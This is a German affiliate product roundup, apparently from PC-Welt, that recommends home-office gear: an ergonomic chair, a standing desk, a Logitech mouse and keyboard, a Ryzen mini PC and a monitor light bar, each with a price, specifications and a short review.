<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f6a58f"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2022/11/award_Backforce-One-Plus.png?w=1200" alt="Backforce One Plus (Empfehlung der Redaktion)" class="wp-image-1377936" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Backforce</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.backforce.gg/de/shop?affiliate=pcwelt" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="backforce" data-subtag="4-0-3153440-7-0-0-0-0">Backforce One Plus beim Hersteller ansehen</a></div>


<p>Preis: 499 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Mechanik:</strong> Ergonomische Synchronmechanik (Wippfunktion mit bis zu 25 Grad Neigungswinkel, Gewichtsregulierung in 7 Schritten)</li>



<li><strong>Einstellbarkeit:</strong> Sitztiefenverstellung, Sitzneigeverstellung, integrierte 2D-Lordosenstütze (flexibel in Höhe und Tiefe justierbar)</li>



<li><strong>Armlehnen:</strong> Gepolsterte 5D-Armlehnen (höhenverstellbar, breitenverstellbar, drehbar und bei Bedarf komplett nach hinten wegklappbar)</li>



<li><strong>Materialien:</strong> Formgeformte Holzschalen (Sitz und Rücken), Dual-Core-Schaumstoff mit zwei Härtezonen, Alcantara-Imitat (atmungsaktiv im Sitzbereich) und PU-Kunstleder (Seitenwangen)</li>



<li><strong>Unterbau:</strong> Glasfaserverstärktes Fußkreuz im Alufelgen-Design, Class-4-Gasdruckfeder</li>



<li><strong>Ergonomie-Zertifikate:</strong> Entwickelt mit den Ergonomie-Experten von Interstuhl, Blauer Engel zertifiziert</li>



<li><strong>Belastbarkeit &amp; Garantie:</strong> Maximal 130 kg Körpergewicht/10 Jahre Herstellergarantie („Made in Germany“)</li>



<li><strong>Besonderheiten:</strong> Personalisierbare Schulter-Patches, akkubetriebene LED-Brosche („Gamer Pulse“) auf der Rückseite</li>
</ul>



<p>Wer im Homeoffice lange Arbeitszeiten <a href="https://www.pcwelt.de/article/3046497/rueckenschmerzen-pc-uebungen-soforthilfe.html" target="_blank" rel="noreferrer noopener">rückenfreundlich</a> bewältigen will, muss nicht zwingend zum klassischen, oft bieder designten Bürostuhl greifen. Der <a href="https://www.backforce.gg/de/shop?affiliate=pcwelt" target="_blank" rel="noreferrer noopener">Backforce One Plus</a> bricht als ergonomischer Crossover-Stuhl das traditionelle Muster auf. </p>



<p>Hinter dem futuristischen und extravagant gestalteten Gaming-Look steckt die Expertise des deutschen Traditionsherstellers Interstuhl. Das Ergebnis ist eine durchdachte Ergonomie-Zentrale, die auf geformte Holzschalen statt billiges Plastik setzt und dank eines Dual-Core-Schaumstoffs mit zwei unterschiedlichen Härtezonen dauerhaft hohen Sitzkomfort bietet.</p>



<p>Im Vergleich zu Standard-Gaming-Stühlen verfügt die verbesserte Plus-Variante über alle essenziellen Office-Funktionen: Eine echte Synchronmechanik sorgt dafür, dass sich Sitzfläche und Rückenlehne im optimalen Verhältnis zueinander bewegen, während die in Höhe und Tiefe verstellbare Lordosenstütze den Lendenwirbelbereich entlastet. </p>



<p>Ein willkommenes Alleinstellungsmerkmal im Alltag sind die gepolsterten 5D-Armlehnen: Die lassen sich bei Bedarf komplett nach hinten wegklappen – so lässt sich der Stuhl nah an die Tischkante rollen oder zwischendurch die Sitzposition variieren. Ein mögliches Manko: Der maximale Wippwinkel von 25 Grad könnte für Nutzer, die sich gerne sehr weit zurücklehnen, jedoch nicht ganz ausreichen.</p>



<p>Die besten Gaming-Stühle finden Sie <a href="https://www.pcwelt.de/article/1204441/die-besten-gaming-stuehle-im-test.html" target="_blank" rel="noreferrer noopener">in unserer Teststrecke</a>.</p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Homeoffice-Tisch: FlexiSpot E5</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f6ad14"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/FlexiSpot-Hohenverstellbarer-Schreibtisch-mit-2-Motoren.jpg?quality=50&amp;strip=all&amp;w=1190" alt="FlexiSpot Höhenverstellbarer Schreibtisch mit 2 Motoren" class="wp-image-3153457" width="1190" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">FlexiSpot </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B09KNFL1T2?tag=pcwelt.de-21&amp;ascsubtag=4-0-3153440-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3153440-7-0-0-0-0">FlexiSpot E5 bei Amazon ansehen</a></div>


<p>Preis: 318 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Abmessungen Tischplatte:</strong> 160 × 80 cm (einteilige, 25 mm starke Verbundplatte, verschiedene Dekore wie Ahorn verfügbar)</li>



<li><strong>Antrieb &amp; Motoren:</strong> Leistungsstarkes Doppelmotorensystem für synchrone Höhenverstellung</li>



<li><strong>Höhenverstellbarkeit:</strong> Stufenlos von 70 cm bis 119 cm</li>



<li><strong>Hubgeschwindigkeit:</strong> Bis zu 25 mm/s bei leisem Betrieb</li>



<li><strong>Tragfähigkeit:</strong> Maximal 100 kg statische/dynamische Belastbarkeit</li>



<li><strong>Bedienfeld:</strong> Intelligente Handsteuerung mit LED-Display und 4 individuellen Speicherplätzen (Memory-Funktion)</li>



<li><strong>Sicherheitssysteme:</strong> Integrierter, sensorgesteuerter Kollisionsschutz (Anti-Kollisionssystem)</li>



<li><strong>Herstellergarantie:</strong> 5 Jahre Garantie auf das Rahmengestell, 3 Jahre Garantie auf die Motoren (inklusive lebenslangem technischen Support)</li>
</ul>



<p>Dieser <a href="https://www.amazon.de/dp/B09KNFL1T2?tag=pcwelt.de-21&amp;ascsubtag=rss">höhenverstellbare S</a><a href="https://www.amazon.de/dp/B09KNFL1T2?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">chreibtisch von FlexiSpot</a> bildet mit 160 × 80 Zentimetern ein solides und ergonomisches Fundament für Ihr Homeoffice im Jahr 2026. Das Modell setzt auf ein effizientes Doppelmotorensystem, das die 25 Millimeter dicke, einteilige Tischplatte auch bei ungleichmäßiger Belastung verwerfungsfrei nach oben oder unten bewegt. Mit einer maximalen Traglast von 100 Kilogramm bietet der Tisch einige Reserven, um schwere Office-PCs, Halterungsarme und mehrere Monitore gleichzeitig sicher zu tragen.</p>



<p>Die Steuerung erfolgt mit einem Handbedienfeld, über das sich vier favorisierte Sitz- und Stehhöhen dauerhaft abspeichern lassen. Ein Knopfdruck genügt, um die Position im Laufe des Arbeitstages dynamisch zu wechseln. Für die nötige Sicherheit im Wohnbereich sorgt das integrierte Anti-Kollisionssystem: Erkennt der Tisch beim Herunterfahren einen Widerstand – etwa einen Rollcontainer oder eine Stuhllehne –, stoppt der Motor automatisch. </p>



<p>Dank einer großen Auswahl an Farbvarianten für Gestell und Platte lässt sich das Möbelstück in bestehende Wohnkonzepte integrieren. Lediglich der maximale Höhenbereich von 119 Zentimetern sollte vor dem Kauf mit der eigenen Körpergröße abgeglichen werden – für Personen weit über 1,90 Meter könnte der Hub im Stehen nämlich etwas knapp werden.</p>



<p><strong>Tipp</strong>: Die besten Gaming-Tische stellen wir Ihnen <a href="https://www.pcwelt.de/article/1197819/gaming-tisch-die-besten-modelle-fuer-gamer.html" target="_blank" rel="noreferrer noopener">in diesem Ratgeber vor.</a></p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Office-Maus: Logitech MX Master 3S</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f6b6f7"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Logitech-MX-Master-3S.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Logitech MX Master 3S" class="wp-image-3153459" width="1200" height="681" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Logitech </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="http://www.amazon.de/dp/B0FHHV6YR5?tag=pcwelt.de-21&amp;ascsubtag=4-0-3153440-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="" data-subtag="4-0-3153440-7-0-0-0-0">Logitech MX Master 3S bei Amazon ansehen</a></div>


<p>Preis: 100 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Sensor-Technologie:</strong> Darkfield High Precision mit bis zu 8.000 DPI (Abtastung funktioniert auf fast allen Oberflächen, einschließlich Glas ab 4 mm Dicke)</li>



<li><strong>Tasten &amp; Geräuschentwicklung:</strong> 7 Tasten mit „Quiet Clicks“-Technologie (90 % weniger Klickgeräusche im Vergleich zum Vorgängermodell)</li>



<li><strong>Scroll-System:</strong> Elektromagnetisches MagSpeed-Scrollrad, dediziertes Daumen-Bedienelement für horizontales Scrollen</li>



<li><strong>Konnektivität &amp; Kompatibilität:</strong> Bluetooth Low Energy; kompatibel mit Windows, macOS, Linux und ChromeOS (koppelbar mit bis zu 3 Geräten via Easy-Switch)</li>



<li><strong>Smarte Features:</strong> Unterstützt <em>Logitech Flow</em> (nahtlose Steuerung und Dateiübertragung zwischen mehreren Computern gleichzeitig)</li>



<li><strong>Software-Anbindung:</strong> Anpassbare Tasten und App-spezifische Profile über die Logi Options+ App</li>
</ul>



<p>Wer im Homeoffice täglich viele Stunden am Bildschirm arbeitet, findet in der <a href="http://www.amazon.de/dp/B0FHHV6YR5?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Logitech MX Master 3S</a> ein treues und hochwertiges Werkzeug. Die ergonomisch geformte Silhouette ist speziell darauf ausgelegt, die Handfläche zu unterstützen und eine natürliche Haltung des Handgelenks zu fördern. Technisch sticht vor allem das elektromagnetische MagSpeed-Scrollrad hervor: Es arbeitet nahezu geräuschlos, lässt sich präzise stoppen und schaltet bei schnellen Bewegungen automatisch in einen rasanten Freilauf, um lange Dokumente oder Tabellen schneller zu durchlaufen.</p>



<p>Die gedämpften Tastenschalter eliminieren Klickgeräusche fast vollständig und können Störungen in Videokonferenzen damit geschickt verhindern. Der 8.000-DPI-Sensor arbeitet auch auf schwierigen Oberflächen wie Glas zuverlässig. </p>



<p>Für das Arbeiten an mehreren Computern parallel bietet die <em>Flow</em>-Funktion echten Nutzwert: Der Mauszeiger gleitet über die Bildschirmgrenzen hinweg, um Texte oder Dateien direkt per Copy-and-Paste zwischen zwei PCs zu übertragen. <strong>Aufgrund der asymmetrischen Bauform ist dieses Modell allerdings ausschließlich für Rechtshänder geeignet.</strong></p>



<p>Sie suchen eine Gaming-Maus? <a href="https://www.pcwelt.de/article/1159094/beste-gaming-maus-test.html" target="_blank" rel="noreferrer noopener">Hier finden Sie die besten Modelle</a>.</p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Tastatur: Logitech MX Keys S</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f6c0de"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Logitech-MX-Keys-S.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Logitech MX Keys S" class="wp-image-3153462" width="1200" height="567" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Logitech </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B07W8Q8VY6?tag=pcwelt.de-21&amp;ascsubtag=4-0-3153440-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3153440-7-0-0-0-0">Logitech MX Keys S bei Amazon ansehen</a></div>


<p>Preis: 120 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Tastatur-Layout:</strong> Deutsches QWERTZ-Layout (Full-Size inkl. Ziffernblock), flaches Low-Profile-Design</li>



<li><strong>Tasten-Technologie:</strong> Membran-Schalter („Fluid Quiet Typing“) mit kugelförmigen Tastenmulden</li>



<li><strong>Beleuchtung:</strong> Intelligente Hintergrundbeleuchtung (aktiviert sich per Näherungssensor und passt sich dem Umgebungslicht an)</li>



<li><strong>Konnektivität:</strong> Bluetooth Low Energy (BLE) oder Logi Bolt USB-Empfänger (im Lieferumfang enthalten)</li>



<li><strong>Multi-Device &amp; Multi-OS:</strong> Koppelbar mit bis zu 3 Geräten; unterstützt Windows, macOS, Linux, ChromeOS</li>



<li><strong>Akkulaufzeit:</strong> Bis zu 10 Tage mit aktiver Beleuchtung, bis zu 5 Monate bei ausgeschalteter Beleuchtung (wiederaufladbar über USB-C)</li>



<li><strong>Smarte Features:</strong> Unterstützung von Makros (<em>Smart Actions</em>) und <em>Logitech Flow</em> über die Logi Options+-App</li>
</ul>



<p>Die <a href="https://www.amazon.de/dp/B07W8Q8VY6?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Logitech MX Keys S</a> ist als flache Low-Profile-Tastatur das passende Gegenstück zur MX-Master-Maus. Die Tasten sind mit einer leichten, kreisförmigen Vertiefung versehen, die sich der Fingerform anpasst und so die Tippgenauigkeit erhöht. </p>



<p>Das Tippgefühl erinnert an eine hochwertige Laptop-Tastatur, arbeitet jedoch spürbar leiser, was den Einsatz im gemeinsamen Büro oder in Telefonaten erleichtert. Die solide Bauweise sorgt für ein stabiles Liegen auf dem Schreibtisch ohne Durchbiegen.</p>



<p>Die integrierte Hintergrundbeleuchtung reagiert über Sensoren auf die Annäherung der Hände und reguliert die Helligkeit automatisch nach dem vorhandenen Raumlicht. Über die zugehörige Software lassen sich automatisierte Kurzbefehle (<em>Smart Actions</em>) anlegen, um wiederkehrende Arbeitsabläufe mit einem einzigen Tastendruck auszuführen. </p>



<p>Wie die MX Master 3S beherrscht auch die Tastatur das geräteübergreifende Arbeiten via <em>Flow</em>-Funktion und schaltet auf Knopfdruck zwischen bis zu drei gekoppelten Computern um. Einziger Konstruktionsnachteil: Die Tastatur besitzt keine ausklappbaren Standfüße, der vorgegebene Aufstellwinkel ist also fixiert.</p>



<p>Wenn Sie ein anderes Modell suchen: <a href="https://www.pcwelt.de/article/1202798/test-kabellose-tastaturen.html" target="_blank" rel="noreferrer noopener">Hier testen wir die besten Keyboards ohne Kabel.</a></p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Mini-PC: NiPoGi AM06 PRO mit АMD Ryzen 7</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f6c9c9"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/NiPoGi-AM06-PRO-Mini-PC-%D0%90MD-Ryzen-7.jpg?quality=50&amp;strip=all&amp;w=1200" alt="NiPoGi AM06 PRO Mini PC АMD Ryzen 7" class="wp-image-3153465" width="1200" height="1084" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">NiPoGi </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0FY2KLJ4G?tag=pcwelt.de-21&amp;ascsubtag=4-0-3153440-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3153440-7-0-0-0-0">NiPoGi AM06 PRO Mini PC bei Amazon ansehen</a></div>


<p>Preis: 700 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Prozessor:</strong> AMD Ryzen 7 7730U (8 Kerne / 16 Threads, Zen 3-Architektur, bis zu 4,5 GHz)</li>



<li><strong>Arbeitsspeicher:</strong> 32 GB DDR4 RAM (Dual-Channel, erweiterbar auf bis zu 64 GB)</li>



<li><strong>Datenspeicher:</strong> 1 TB M.2 NVMe SSD (Erweiterbar über einen zweiten M.2-Slot sowie einen 2,5-Zoll-SATA-Schacht)</li>



<li><strong>Grafik:</strong> Integrierte AMD Radeon Graphics (8 Kerne, 2000 MHz)</li>



<li><strong>Konnektivität:</strong> Wi-Fi 6 (802.11ax), Bluetooth 5.2, Dual-Gigabit-Ethernet (2 × RJ45-LAN-Ports)</li>



<li><strong>Anschlüsse Front:</strong> 2 × USB 3.2 Gen 2 Type-A (10 Gbit/s), 1 × 3,5-mm-Audiobuchse</li>



<li><strong>Anschlüsse Rückseite:</strong> 2 × USB 2.0 Type-A, 1 × HDMI 2.0, 1 × DisplayPort, 1 × voll ausgestatteter USB 3.2 Gen 2 Type-C (Daten, Strom und Videoausgabe), 1 × USB-C-Stromeingang</li>



<li><strong>Betriebssystem:</strong> Windows 11 Pro vorinstalliert</li>



<li><strong>Lieferumfang:</strong> Mini-PC, Netzteil, HDMI-Kabel, VESA-Montagehalterung</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0FY2KLJ4G?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">NiPoGi AM06 PRO</a> bringt die nötigen Leistungsreserven mit, um als langlebige Zentrale im Homeoffice zu fungieren. Angetrieben von einem AMD Ryzen 7 Prozessor mit acht Kernen und großzügigen 32 Gigabyte Arbeitsspeicher meistert der kompakte Desktop-Zwerg auch intensives Multitasking. Das System reagiert beim parallelen Betrieb von aufwendigen Datenbanken, unzähligen Browser-Tabs und hochauflösenden Videokonferenzen immer noch flüssig. </p>



<p>Mit seinem 15-Watt-Design bleibt der Stromverbrauch des Prozessors niedrig, was auch dem Kühlsystem im Bürobetrieb zu leiser Arbeit verhilft.</p>



<p>Die Anschlussausstattung des Gehäuses ist ordentlich: Über HDMI, DisplayPort und den modernen USB-C-Port lässt sich ein Triple-Monitor-Set-up mit jeweils 4K-Auflösung realisieren. Für eine stabile Netzwerkanbindung sorgen zeitgemäßes Wi-Fi 6 sowie zwei physische Gigabit-LAN-Anschlüsse auf der Rückseite. Über die mitgelieferte VESA-Platte kann der Rechner bei Bedarf komplett unsichtbar hinter dem Monitor montiert werden. </p>



<p>Als Einschränkung muss man aber anmerken, dass die integrierte Grafiklösung zwar für einfache kreative Anwendungen und Gelegenheitsspiele ausreicht, bei modernen, grafikintensiven 3D-Spielen oder professionellen 4K-Renderings jedoch an ihre Grenzen stößt – bei Mini-PCs ist das eine typische Schwäche. Für den reinen, anspruchsvollen Produktiveinsatz bietet das Gesamtsystem jedoch ein richtig starkes Fundament.</p>



<p><a href="https://www.pcwelt.de/article/2929635/beste-mini-pc-angebote-amazon-290526.html" target="_blank" rel="noreferrer noopener">Hier stellen wir weitere Spitzen-Modelle (Mini-PCs) bei Amazon vor</a></p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Beleuchtung im Homeoffice: Quntis Computer Monitor Lampe LED mit Fernbedienung</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f6d1f1"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Quntis-Computer-Monitor-Lampe-LED-mit-Fernbedienung.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Quntis Computer Monitor Lampe LED mit Fernbedienung" class="wp-image-3153467" width="1200" height="961" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Quntis </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B08DKQ3JG1?tag=pcwelt.de-21&amp;ascsubtag=4-0-3153440-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3153440-7-0-0-0-0">Quntis Computer Monitor Lampe bei Amazon ansehen</a></div>


<p>Preis: 50 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Länge der Lichtleiste:</strong> 40 cm (optimiert für Monitore von 15 bis 22 Zoll mit einer Gehäusedicke von 0,7 bis 3,5 cm; nicht für Notebooks geeignet)</li>



<li><strong>Leuchtmittel &amp; Schutz:</strong> Flackerfreie LEDs mit integriertem Anti-Blaulicht-Filter (augenschonend)</li>



<li><strong>Steuerung:</strong> Kombinierte Bedienung über Touch-Tasten direkt an der Leiste sowie eine zusätzliche kabellose Fernbedienung</li>



<li><strong>Helligkeit:</strong> Stufenlos oder in vordefinierten Stufen von 5 % bis 100 % regelbar</li>



<li><strong>Farbtemperatur:</strong> Stufenlos einstellbar von warmweiß (3000 Kelvin) bis tageslichtweiß (6500 Kelvin)</li>



<li><strong>Automatik-Modus:</strong> Integrierter Lichtsensor für automatisches Dimmen basierend auf dem Umgebungslicht</li>



<li><strong>Stromversorgung:</strong> USB-Betrieb via mitgeliefertem 2-Meter-USB-C-Kabel (5V/1A), Anschluss am PC, Monitor oder Netzteil möglich</li>



<li><strong>Energieeffizienz:</strong> Energieklasse A</li>
</ul>



<p>Die <a href="https://www.amazon.de/dp/B08DKQ3JG1?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Quntis Monitor Light Bar</a> bietet eine platzsparende und preiswerte Methode, um Ihren Arbeitsplatz im Homeoffice ergonomisch auszuleuchten. Die 40 Zentimeter lange Leiste wird einfach auf die Oberseite des Bildschirms geklemmt, so bleibt die eigentliche Schreibtischfläche frei für Dokumente, Tastatur und Maus. Die Optik ist so konstruiert, dass der Lichtkegel ausschließlich nach vorn und unten auf die Arbeitsfläche fällt. Dadurch werden Reflexionen oder Blendungen auf dem Display verhindert und Schattenwürfe minimiert.</p>



<p>Ein echter Komfortgewinn bei der täglichen Arbeit ist die duale Steuerung: Einstellungen lassen sich direkt per Touch an der Oberseite oder bequem über die mitgelieferte Fernbedienung vornehmen. Neben der manuellen Justierung von Helligkeit und Farbtemperatur verfügt die Leiste über einen automatischen Dimm-Modus. </p>



